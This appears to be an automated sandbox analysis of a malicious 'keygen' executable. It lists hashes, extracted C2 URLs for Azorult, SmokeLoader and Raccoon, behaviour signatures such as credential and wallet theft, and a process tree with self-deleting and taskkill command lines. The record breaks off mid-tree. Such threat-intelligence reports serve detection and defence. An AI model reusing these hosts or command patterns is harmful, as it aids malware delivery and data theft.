Analysis

  • max time kernel
    332s
  • max time network
    591s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    04-04-2021 18:22

General

  • Target

    Paint_Shop_Pro_6_02_Eval_all_keygen.exe

  • Size

    5.2MB

  • MD5

    c9d0760f5504d9e8ce237543fc4e7562

  • SHA1

    12dac9b23d9f95b9647767e15a265a73380ad50b

  • SHA256

    2519f6e84956fd35aaf7aa0ac51c2ce4cd8fddc973933936560ddb1efff6a16f

  • SHA512

    28e06d8763858601484ec3675b5d0895712b616d69b36d4c584f32dfb56dfe9a7c26ad05dfda27efc2e9512c11d7dedcafd4d69d98baffdda8eb5af9ba99398a

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

9420f36ff86e78bbb8ce4073fa910f921ce2bebf

Attributes
  • url4cnc

    https://tttttt.me/hobamantfr1

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 4 IoCs
  • Blocklisted process makes network request 15 IoCs
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks for any installed AV software in registry 1 TTPs 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 15 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Script User-Agent 16 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1152
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2828
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
        • Modifies registry class
        PID:2644
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2624
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2496
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2436
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1888
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1352
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1316
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1108
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      • Drops file in Windows directory
                      PID:1032
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:344
                      • C:\Users\Admin\AppData\Local\Temp\Paint_Shop_Pro_6_02_Eval_all_keygen.exe
                        "C:\Users\Admin\AppData\Local\Temp\Paint_Shop_Pro_6_02_Eval_all_keygen.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:496
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:196
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                            keygen-pr.exe -p83fsase3Ge
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4008
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2868
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                5⤵
                                  PID:3644
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                              keygen-step-1.exe
                              3⤵
                              • Executes dropped EXE
                              PID:1232
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                              keygen-step-3.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3088
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3396
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 1.1.1.1 -n 1 -w 3000
                                  5⤵
                                  • Runs ping.exe
                                  PID:2592
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                              keygen-step-4.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2036
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:3500
                                • C:\Users\Admin\AppData\Local\Temp\YSISDHMPY8\multitimer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\YSISDHMPY8\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2188
                                  • C:\Users\Admin\AppData\Local\Temp\YSISDHMPY8\multitimer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\YSISDHMPY8\multitimer.exe" 1 3.1617560646.606a04468bf37 101
                                    6⤵
                                      PID:4372
                                      • C:\Users\Admin\AppData\Local\Temp\YSISDHMPY8\multitimer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\YSISDHMPY8\multitimer.exe" 2 3.1617560646.606a04468bf37
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks for any installed AV software in registry
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4480
                                        • C:\Users\Admin\AppData\Local\Temp\cs0yjacq3xw\23dxrrc0ga0.exe
                                          "C:\Users\Admin\AppData\Local\Temp\cs0yjacq3xw\23dxrrc0ga0.exe" /ustwo INSTALL
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4376
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "23dxrrc0ga0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\cs0yjacq3xw\23dxrrc0ga0.exe" & exit
                                            9⤵
                                              PID:6100
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im "23dxrrc0ga0.exe" /f
                                                10⤵
                                                • Kills process with taskkill
                                                PID:5648
                                          • C:\Users\Admin\AppData\Local\Temp\0mnkymzpm1l\pfk1jbjpnjp.exe
                                            "C:\Users\Admin\AppData\Local\Temp\0mnkymzpm1l\pfk1jbjpnjp.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5016
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\0mnkymzpm1l\pfk1jbjpnjp.exe"
                                              9⤵
                                                PID:5644
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 1.1.1.1 -n 1 -w 3000
                                                  10⤵
                                                  • Runs ping.exe
                                                  PID:5756
                                            • C:\Users\Admin\AppData\Local\Temp\qctb2hyspcp\cpyrix.exe
                                              "C:\Users\Admin\AppData\Local\Temp\qctb2hyspcp\cpyrix.exe" /VERYSILENT
                                              8⤵
                                                PID:5040
                                                • C:\Users\Admin\AppData\Roaming\1.exe
                                                  C:\Users\Admin\AppData\Roaming\1.exe
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:5820
                                                  • C:\Users\Admin\AppData\Roaming\1.exe
                                                    "{path}"
                                                    10⤵
                                                    • Executes dropped EXE
                                                    PID:4924
                                                • C:\Users\Admin\AppData\Roaming\2.exe
                                                  C:\Users\Admin\AppData\Roaming\2.exe
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:5348
                                                  • C:\Users\Admin\AppData\Roaming\2.exe
                                                    "{path}"
                                                    10⤵
                                                    • Executes dropped EXE
                                                    PID:1744
                                              • C:\Users\Admin\AppData\Local\Temp\lcmqpj3m3eh\Setup3310.exe
                                                "C:\Users\Admin\AppData\Local\Temp\lcmqpj3m3eh\Setup3310.exe" /Verysilent /subid=577
                                                8⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:1460
                                                • C:\Users\Admin\AppData\Local\Temp\is-5EKLO.tmp\Setup3310.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-5EKLO.tmp\Setup3310.tmp" /SL5="$602FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\lcmqpj3m3eh\Setup3310.exe" /Verysilent /subid=577
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:856
                                                  • C:\Users\Admin\AppData\Local\Temp\is-LN9I9.tmp\Setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-LN9I9.tmp\Setup.exe" /Verysilent
                                                    10⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:4020
                                                    • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
                                                      "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
                                                      11⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5040
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        12⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2076
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        12⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:5008
                                                    • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
                                                      "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
                                                      11⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5332
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 952
                                                        12⤵
                                                        • Drops file in Windows directory
                                                        • Program crash
                                                        PID:10896
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1008
                                                        12⤵
                                                        • Program crash
                                                        PID:11240
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1044
                                                        12⤵
                                                        • Program crash
                                                        PID:12012
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1208
                                                        12⤵
                                                        • Program crash
                                                        PID:12824
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1248
                                                        12⤵
                                                        • Program crash
                                                        PID:12872
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1020
                                                        12⤵
                                                        • Program crash
                                                        PID:6880
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1504
                                                        12⤵
                                                        • Program crash
                                                        PID:6516
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1604
                                                        12⤵
                                                        • Program crash
                                                        PID:7144
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1656
                                                        12⤵
                                                        • Program crash
                                                        PID:7508
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1548
                                                        12⤵
                                                        • Program crash
                                                        PID:7328
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1804
                                                        12⤵
                                                        • Program crash
                                                        PID:8320
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1844
                                                        12⤵
                                                        • Program crash
                                                        PID:9372
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 1836
                                                        12⤵
                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                        • Program crash
                                                        PID:10136
                                                    • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
                                                      "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
                                                      11⤵
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      • Drops file in Program Files directory
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4788
                                                    • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
                                                      "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
                                                      11⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5744
                                                      • C:\Users\Admin\AppData\Local\Temp\is-SPU0P.tmp\LabPicV3.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-SPU0P.tmp\LabPicV3.tmp" /SL5="$202B8,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
                                                        12⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4368
                                                        • C:\Users\Admin\AppData\Local\Temp\is-RLS8T.tmp\ppppppfy.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-RLS8T.tmp\ppppppfy.exe" /S /UID=lab214
                                                          13⤵
                                                          • Drops file in Drivers directory
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Modifies system certificate store
                                                          PID:2548
                                                          • C:\Program Files\Windows Defender Advanced Threat Protection\FDLSGCRCTZ\prolab.exe
                                                            "C:\Program Files\Windows Defender Advanced Threat Protection\FDLSGCRCTZ\prolab.exe" /VERYSILENT
                                                            14⤵
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5416
                                                            • C:\Users\Admin\AppData\Local\Temp\is-BCQ0I.tmp\prolab.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-BCQ0I.tmp\prolab.tmp" /SL5="$30390,575243,216576,C:\Program Files\Windows Defender Advanced Threat Protection\FDLSGCRCTZ\prolab.exe" /VERYSILENT
                                                              15⤵
                                                              • Drops file in Program Files directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5220
                                                          • C:\Users\Admin\AppData\Local\Temp\ba-ba38d-bda-653b4-0524c71ed2ad5\Powaekywili.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\ba-ba38d-bda-653b4-0524c71ed2ad5\Powaekywili.exe"
                                                            14⤵
                                                              PID:5260
                                                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                dw20.exe -x -s 2292
                                                                15⤵
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:10556
                                                            • C:\Users\Admin\AppData\Local\Temp\c8-b949c-2cf-f01af-7ba2b4608ba7a\Fysagiwaemo.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\c8-b949c-2cf-f01af-7ba2b4608ba7a\Fysagiwaemo.exe"
                                                              14⤵
                                                                PID:5252
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r21i1mys.rbt\md6_6ydj.exe & exit
                                                                  15⤵
                                                                    PID:13104
                                                                    • C:\Users\Admin\AppData\Local\Temp\r21i1mys.rbt\md6_6ydj.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\r21i1mys.rbt\md6_6ydj.exe
                                                                      16⤵
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:9728
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m32ij03d.510\askinstall31.exe & exit
                                                                    15⤵
                                                                      PID:6488
                                                                      • C:\Users\Admin\AppData\Local\Temp\m32ij03d.510\askinstall31.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\m32ij03d.510\askinstall31.exe
                                                                        16⤵
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:4052
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                          17⤵
                                                                            PID:8940
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im chrome.exe
                                                                              18⤵
                                                                              • Kills process with taskkill
                                                                              PID:9336
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rtu0j52b.zmk\toolspab1.exe & exit
                                                                        15⤵
                                                                          PID:7116
                                                                          • C:\Users\Admin\AppData\Local\Temp\rtu0j52b.zmk\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\rtu0j52b.zmk\toolspab1.exe
                                                                            16⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:6632
                                                                            • C:\Users\Admin\AppData\Local\Temp\rtu0j52b.zmk\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\rtu0j52b.zmk\toolspab1.exe
                                                                              17⤵
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:7280
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sot3zrub.acw\GcleanerWW.exe /mixone & exit
                                                                          15⤵
                                                                            PID:6180
                                                                  • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
                                                                    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
                                                                    11⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:6004
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-M7MN7.tmp\lylal220.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-M7MN7.tmp\lylal220.tmp" /SL5="$303FA,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
                                                                      12⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4468
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-IK96N.tmp\Microsoft.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-IK96N.tmp\Microsoft.exe" /S /UID=lylal220
                                                                        13⤵
                                                                        • Drops file in Drivers directory
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • Drops file in Program Files directory
                                                                        PID:1468
                                                                        • C:\Program Files\Reference Assemblies\YMFJDCDBSL\irecord.exe
                                                                          "C:\Program Files\Reference Assemblies\YMFJDCDBSL\irecord.exe" /VERYSILENT
                                                                          14⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:4812
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-UAPSE.tmp\irecord.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-UAPSE.tmp\irecord.tmp" /SL5="$502D0,6265333,408064,C:\Program Files\Reference Assemblies\YMFJDCDBSL\irecord.exe" /VERYSILENT
                                                                            15⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            • Drops file in Windows directory
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:2856
                                                                        • C:\Users\Admin\AppData\Local\Temp\d2-7bbfa-1f1-04c9e-058d39d2ee690\Desokymaebo.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\d2-7bbfa-1f1-04c9e-058d39d2ee690\Desokymaebo.exe"
                                                                          14⤵
                                                                          • Executes dropped EXE
                                                                          PID:5964
                                                                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                            dw20.exe -x -s 1952
                                                                            15⤵
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:10860
                                                                        • C:\Users\Admin\AppData\Local\Temp\cb-5f466-c5b-d859c-7d3df2d7ca6f5\Labyvoqylu.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\cb-5f466-c5b-d859c-7d3df2d7ca6f5\Labyvoqylu.exe"
                                                                          14⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:5708
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2m2rui2u.emz\md6_6ydj.exe & exit
                                                                            15⤵
                                                                              PID:6236
                                                                              • C:\Users\Admin\AppData\Local\Temp\2m2rui2u.emz\md6_6ydj.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\2m2rui2u.emz\md6_6ydj.exe
                                                                                16⤵
                                                                                • Checks whether UAC is enabled
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:7028
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fwlc1ugw.bgx\askinstall31.exe & exit
                                                                              15⤵
                                                                                PID:7004
                                                                                • C:\Users\Admin\AppData\Local\Temp\fwlc1ugw.bgx\askinstall31.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\fwlc1ugw.bgx\askinstall31.exe
                                                                                  16⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:3420
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\23x4jl2x.zeg\toolspab1.exe & exit
                                                                                15⤵
                                                                                  PID:5212
                                                                                  • C:\Users\Admin\AppData\Local\Temp\23x4jl2x.zeg\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\23x4jl2x.zeg\toolspab1.exe
                                                                                    16⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:7904
                                                                                    • C:\Users\Admin\AppData\Local\Temp\23x4jl2x.zeg\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\23x4jl2x.zeg\toolspab1.exe
                                                                                      17⤵
                                                                                        PID:8188
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hogbouxl.raf\GcleanerWW.exe /mixone & exit
                                                                                    15⤵
                                                                                      PID:7728
                                                                            • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
                                                                              "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
                                                                              11⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:4288
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
                                                                                12⤵
                                                                                  PID:4904
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
